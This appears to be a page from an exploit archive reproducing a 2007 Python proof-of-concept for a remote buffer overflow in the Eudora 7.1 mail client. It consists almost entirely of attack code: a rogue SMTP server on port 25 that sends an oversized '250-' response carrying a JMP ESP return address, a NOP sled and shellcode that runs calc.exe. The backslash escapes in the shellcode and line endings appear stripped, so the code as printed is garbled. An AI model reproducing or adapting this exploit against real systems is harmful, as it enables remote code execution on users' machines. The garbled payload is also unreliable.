Eudora 7.1 SMTP ResponseRemote Remote Buffer Overflow Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Eudora 7.1 SMTP ResponseRemote Remote Buffer Overflow Exploit
# Published : 2007-05-15
# Author : h07
# Previous Title : DeWizardX (DEWizardAX.ocx) Arbitrary File Overwrite Exploit
# Next Title : webdesproxy 0.0.1 (GET Request) Remote Root Exploit (exec-shield)

#!/usr/bin/python
# Eudora 7.1 SMTP Response 0day Remote Buffer Overflow PoC Exploit
# Bug discovered by Krystian Kloskowski (h07) <h07@interia.pl>
# Tested on Eudora 7.1.0.9 / XP SP2 Polish
# Shellcode type: Windows Execute Command (calc.exe)
# Note:..
# This vulnerability can be exploited only if user
# will ignore warning about "buffer overflow" error.
##

from struct import pack
from time import sleep
from socket import *

bind_addr = '0.0.0.0'
bind_port = 25

shellcode = (
"x31xc9x83xe9xdbxd9xeexd9x74x24xf4x5bx81x73x13xd8"
"x22x72xe4x83xebxfcxe2xf4x24xcax34xe4xd8x22xf9xa1"
"xe4xa9x0exe1xa0x23x9dx6fx97x3axf9xbbxf8x23x99x07"
"xf6x6bxf9xd0x53x23x9cxd5x18xbbxdex60x18x56x75x25"
"x12x2fx73x26x33xd6x49xb0xfcx26x07x07x53x7dx56xe5"
"x33x44xf9xe8x93xa9x2dxf8xd9xc9xf9xf8x53x23x99x6d"
"x84x06x76x27xe9xe2x16x6fx98x12xf7x24xa0x2dxf9xa4"
"xd4xa9x02xf8x75xa9x1axecx31x29x72xe4xd8xa9x32xd0"
"xddx5ex72xe4xd8xa9x1axd8x87x13x84x84x8exc9x7fx8c"
"x28xa8x76xbbxb0xbax8cx6exd6x75x8dx03x30xccx8dx1b"
"x27x41x13x88xbbx0cx17x9cxbdx22x72xe4")

opcode = 0x7CA58265 # JMP ESP (SHELL32.DLL / XP SP2 Polish)

buf = "250-"
buf += "A" * 76
buf += pack("<L", opcode)
buf += "x90" * 32
buf += shellcode
buf += "rn"

s = socket(AF_INET, SOCK_STREAM)
s.bind((bind_addr, bind_port))
s.listen(1)
print "Listening on %s:%d..." % (bind_addr, bind_port)
cl, addr = s.accept()
print "Connected accepted from: %s" % (addr[0])
cl.send('220 Dupa Jasiarn')
print cl.recv(1024)[:-1]
cl.send(buf)
sleep(1)
cl.close()
s.close()
print "Done"

# EoF

# www.Syue.com [2007-05-15]